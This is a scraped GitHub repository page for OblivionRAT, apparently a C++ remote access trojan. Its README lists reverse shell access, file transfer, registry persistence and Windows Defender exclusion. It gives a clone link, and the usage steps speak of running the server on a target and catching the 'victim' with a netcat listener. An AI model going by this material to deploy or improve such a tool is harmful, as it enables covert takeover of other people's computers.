supergmax / OblivionRAT_forked

the next version of oblivion

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

OblivionRAT

Description

OblivionRAT is a remote administration tool that allows you to control remote computers over a network. Educational Purposes Only !

Features

  • Reverse shell access
  • File transfer
  • Redundancy with startup registry
  • Exclusion of windows defender

Installation

  1. Clone the repository: git clone https://github.com/makesse24/OblivionRAT
  2. Create solution with Visual Studio
  3. Compile

Usage

  1. Launch the server application on the target machine.
  2. Use nc -lnvp <port> to connect to the victim
  3. Start controlling the remote machine.

Contributing

Contributions are welcome! If you have any ideas, suggestions, or bug reports, please open an issue or submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for more details.

Contact

For any questions or inquiries, please contact us

About

the next version of oblivion

License:MIT License


Languages

Language:C++ 97.4%Language:C 2.6%